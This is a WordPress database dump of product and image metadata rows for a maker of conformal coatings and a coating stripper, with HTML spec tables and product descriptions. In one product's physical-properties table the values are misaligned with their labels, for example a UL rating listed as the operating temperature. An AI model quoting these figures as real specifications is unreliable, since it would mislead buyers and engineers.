INSERT INTO `wp_postmeta` VALUES (4239, 616, '_wp_attached_file', '2016/08/Arylic-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4240, 616, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4752;s:6:"height";i:3168;s:4:"file";s:26:"2016/08/Arylic-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"Arylic-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:26:"Arylic-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"Arylic-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"Arylic-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:26:"Arylic-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:26:"Arylic-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:26:"Arylic-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:26:"Arylic-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4241, 618, '_wp_attached_file', '2016/08/Varnish-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4242, 618, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4752;s:6:"height";i:3168;s:4:"file";s:27:"2016/08/Varnish-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"Varnish-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"Varnish-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"Varnish-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"Varnish-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"Varnish-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"Varnish-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"Varnish-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"Varnish-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4243, 619, '_wp_attached_file', '2016/08/Conformal-coating-stripper.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4244, 619, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4000;s:6:"height";i:4000;s:4:"file";s:38:"2016/08/Conformal-coating-stripper.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"Conformal-coating-stripper-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"Conformal-coating-stripper-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4245, 620, '_edit_lock', '1501506848:1'); 
INSERT INTO `wp_postmeta` VALUES (4246, 620, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (4247, 620, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4248, 620, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4249, 620, '312_default_editor', '<strong>Cure Electrical Properties</strong>\r\n<table width="326">\r\n<tbody>\r\n<tr>\r\n<td width="244">Dielectric Strength (volts/mil)</td>\r\n<td width="82">400</td>\r\n</tr>\r\n<tr>\r\n<td>Dielectric Constant (10Hz )</td>\r\n<td>2.74</td>\r\n</tr>\r\n<tr>\r\n<td>Dissipation Factor 10^5 Hz</td>\r\n<td>&lt;0.0002</td>\r\n</tr>\r\n<tr>\r\n<td>Volume Resistivity (ohm/cm)</td>\r\n<td>5x10^13</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Cure Physical Properties</strong>\r\n<table width="326">\r\n<tbody>\r\n<tr>\r\n<td width="244">Operating Temperature</td>\r\n<td width="82">94 V-00</td>\r\n</tr>\r\n<tr>\r\n<td>UL Flammability Classification</td>\r\n<td>240</td>\r\n</tr>\r\n<tr>\r\n<td>Tensile Strength (psi) @ 77F/25C</td>\r\n<td>74</td>\r\n</tr>\r\n<tr>\r\n<td>Elongation (%) @ 77F/25C</td>\r\n<td>80</td>\r\n</tr>\r\n<tr>\r\n<td>Durometer Hardness, Shore A, Points</td>\r\n<td>2.1 x 10^-4</td>\r\n</tr>\r\n<tr>\r\n<td>Coefficient of Thermal Expansion</td>\r\n<td>2.0 x 10^-4</td>\r\n</tr>\r\n<tr>\r\n<td>Water Absorption</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>100 hrs. @ 77oF/25oC</td>\r\n<td>0.11%</td>\r\n</tr>\r\n<tr>\r\n<td>100 hrs. @ 221F/105C &amp; 98%RH</td>\r\n<td>0.33%</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4250, 620, '317_default_editor', '14 oz Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (4251, 620, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4252, 620, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4253, 620, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4254, 620, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4255, 620, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4256, 620, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4257, 620, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4258, 620, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4259, 620, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4260, 620, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4261, 620, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4262, 620, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4263, 620, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4264, 620, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4265, 620, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4266, 620, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4267, 620, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4268, 620, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4269, 620, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4270, 620, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4271, 620, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4272, 620, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4273, 620, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4274, 620, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (4275, 620, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4276, 620, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4277, 620, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4278, 620, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4279, 620, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (4280, 621, '_edit_lock', '1498062187:3'); 
INSERT INTO `wp_postmeta` VALUES (4281, 621, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (4282, 621, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4283, 621, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4284, 621, '312_default_editor', '<strong><u>Cured Electrical Properties</u></strong>\r\n<table style="height: 129px;" width="452">\r\n<tbody>\r\n<tr>\r\n<td width="244">Dielectric Strength, volts/mil</td>\r\n<td width="82">2000</td>\r\n</tr>\r\n<tr>\r\n<td>Dielectric Constant @ 100 kHz (77°F/25°C)</td>\r\n<td>2.29</td>\r\n</tr>\r\n<tr>\r\n<td>Dissipation Factor@ 100 kHz (77°F/25°C)</td>\r\n<td>0.012</td>\r\n</tr>\r\n<tr>\r\n<td>Volume Resistivity, volts/mil @ (77°F/25°C)</td>\r\n<td>1.04x10(16)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<strong><u>Cured Physical Properties (per MIL-I-46058C</u></strong><strong><u>)</u></strong>\r\n\r\n<strong>Operating Temperature: </strong>-67°F/-55°C to 230°F/110°C\r\n<strong>Appearance:</strong> No blistering, wrinkling, cracking or peeling of film or discoloration of printed conductors or substrate after thermal shock or moisture resistance testing.\r\n<strong>Flexibility:</strong> No cracking or crazing of film in bending over a 1/8" diameter mandrel.\r\n<strong>Fungus Resistance:</strong> Non-nutrient per ASTM G21.\r\n<strong>Fluorescent:</strong> when viewed with ultraviolet light.'); 
INSERT INTO `wp_postmeta` VALUES (4285, 621, '317_default_editor', '14 oz Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (4286, 621, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4287, 621, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4288, 621, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4289, 621, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4290, 621, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4291, 621, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4292, 621, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4293, 621, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4294, 621, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4295, 621, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4296, 621, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4297, 621, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4298, 621, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4299, 621, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4300, 621, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4301, 621, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4302, 621, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4303, 621, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4304, 621, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4305, 621, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4306, 621, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4307, 621, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4308, 621, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4309, 621, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (4310, 621, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4311, 621, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4312, 621, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (4313, 621, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (4314, 621, '_ywtm_content_tab_description', 'Miller-Stephesons\' Acrylic Conformal Coatings offer superior toughness and abrasion resistance, excellent dielectric properties, fungal resistance, and moisture and environmental protection. Our formulation is 100% non-flammable. The acrylic resin meets the requirements of MIL-I-46058C Type AR. Printed circuit boards covered with acrylic coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. MS-475C will cover 6.4 sq. ft. at a 2 mil. thickness per 1- aerosol can.'); 
INSERT INTO `wp_postmeta` VALUES (4315, 621, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4316, 621, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4317, 621, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4318, 621, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4319, 621, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (4320, 622, '_edit_lock', '1477328519:3'); 
INSERT INTO `wp_postmeta` VALUES (4321, 622, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (4322, 622, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4323, 622, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4324, 622, '312_default_editor', '<strong>Cured Electrical Properties</strong>\r\n<table style="height: 66px;" width="391">\r\n<tbody>\r\n<tr>\r\n<td width="193">Dielectric Strength, volts/mil (Dry)</td>\r\n<td width="98">1800</td>\r\n</tr>\r\n<tr>\r\n<td>Dielectric Strength, volts/mil (Wet)</td>\r\n<td>1200</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Chemical Resistance</strong>\r\n<table style="height: 161px;" width="311">\r\n<tbody>\r\n<tr>\r\n<td width="193">Water</td>\r\n<td width="98">Excellent</td>\r\n</tr>\r\n<tr>\r\n<td>Acid (10% Sulfuric Acid)</td>\r\n<td>Excellent</td>\r\n</tr>\r\n<tr>\r\n<td>Alkali</td>\r\n<td>Excellent</td>\r\n</tr>\r\n<tr>\r\n<td>Salt Water</td>\r\n<td>Excellent</td>\r\n</tr>\r\n<tr>\r\n<td>Oil, ASTM D-115</td>\r\n<td>PASS</td>\r\n</tr>\r\n<tr>\r\n<td>Corrosive effect on Copper</td>\r\n<td>None</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Physical Properties</strong>\r\n<table style="height: 120px;" width="328">\r\n<tbody>\r\n<tr>\r\n<td width="193">Highest Operating Temperature</td>\r\n<td width="98">331F / 155C</td>\r\n</tr>\r\n<tr>\r\n<td>Fungus Resistance</td>\r\n<td>PASS</td>\r\n</tr>\r\n<tr>\r\n<td>Fluorescent</td>\r\n<td>Under UV light</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4325, 622, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon drum'); 
INSERT INTO `wp_postmeta` VALUES (4326, 622, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4327, 622, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4328, 622, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4329, 622, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4330, 622, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4331, 622, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4332, 622, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4333, 622, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4334, 622, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4335, 622, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4336, 622, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4337, 622, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4338, 622, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4339, 622, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4340, 622, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4341, 622, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4342, 622, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4343, 622, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4344, 622, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4345, 622, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4346, 622, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4347, 622, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4348, 622, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4349, 622, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (4350, 622, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4351, 622, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4352, 622, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4353, 622, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4354, 622, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (4355, 623, '_edit_lock', '1498837097:3'); 
INSERT INTO `wp_postmeta` VALUES (4356, 623, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (4357, 623, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4358, 623, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4359, 623, '312_default_editor', '<strong>PHYSICAL PROPERTIES:</strong>\r\n<table style="height: 162px;" width="333">\r\n<tbody>\r\n<tr>\r\n<td width="107">Color</td>\r\n<td width="133">Clear to light yellow</td>\r\n</tr>\r\n<tr>\r\n<td width="107">Boiling point</td>\r\n<td width="133">108-118°F/42-48°C</td>\r\n</tr>\r\n<tr>\r\n<td width="107">Vapor pressure</td>\r\n<td width="133">325 psia @ 70ºF</td>\r\n</tr>\r\n<tr>\r\n<td width="107">Density</td>\r\n<td width="133">1.25g/cc @ 77ºF</td>\r\n</tr>\r\n<tr>\r\n<td width="107">VOC Content</td>\r\n<td width="133">690 gms/l</td>\r\n</tr>\r\n<tr>\r\n<td width="107">Flash point</td>\r\n<td width="133">None</td>\r\n</tr>\r\n<tr>\r\n<td width="107">Form</td>\r\n<td width="133">Liquid</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (4360, 623, '317_default_editor', 'Quart, Gallon, 5 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (4361, 623, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4362, 623, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4363, 623, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4364, 623, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4365, 623, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4366, 623, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4367, 623, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4368, 623, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4369, 623, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4370, 623, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4371, 623, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4372, 623, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4373, 623, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4374, 623, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4375, 623, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4376, 623, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4377, 623, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4378, 623, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4379, 623, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4380, 623, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4381, 623, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4382, 623, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4383, 623, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4384, 623, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (4385, 623, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4386, 623, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4387, 623, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (4388, 623, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (4389, 623, '_ywtm_content_tab_description', 'MS-114C, Miller-Stephenson\'s Conformal Coating Stripper is specifically formulated to remove most conformal coatings resins.  MS-114C Conformal Coating Stripping agent will dissolve all Silicone Conformal Coatings, Urethane Conformal Coatings, Acrylic Conformal Coatings, and Varnish Conformal Coatings from many types of electronic circuitry. MS-114C safely dissolves these coatings without causing damage to most electronic components and elastomers. It will attack ABS, acrylic and polystyrene. Compatibility with plastic materials should be tested before use.  Benefits of this product include:\r\n<ul>\r\n 	<li>Nonflammable formulation</li>\r\n 	<li>Fast, effective confortmal coating removal</li>\r\n 	<li>Safe for printed circuit boards and electronics</li>\r\n 	<li>Contains no ozone depleting chemicals</li>\r\n 	<li>RoHS compliant</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (4390, 623, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4391, 623, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4392, 623, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4393, 623, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4394, 623, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (4395, 624, '_wp_attached_file', '2016/08/millube-e1471624590127.png'); 
INSERT INTO `wp_postmeta` VALUES (4396, 624, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:34:"2016/08/millube-e1471624590127.png";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"millube-e1471624590127-250x114.png";s:5:"width";i:250;s:6:"height";i:114;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"millube-e1471624590127-200x114.png";s:5:"width";i:200;s:6:"height";i:114;s:9:"mime-type";s:9:"image/png";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"millube-e1471624590127-225x114.png";s:5:"width";i:225;s:6:"height";i:114;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4397, 624, '_edit_lock', '1471624434:1'); 
INSERT INTO `wp_postmeta` VALUES (4398, 624, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:11:"millube.png";}}'); 
INSERT INTO `wp_postmeta` VALUES (4399, 626, '_wp_attached_file', '2016/08/milsolv-e1471624745570.png'); 
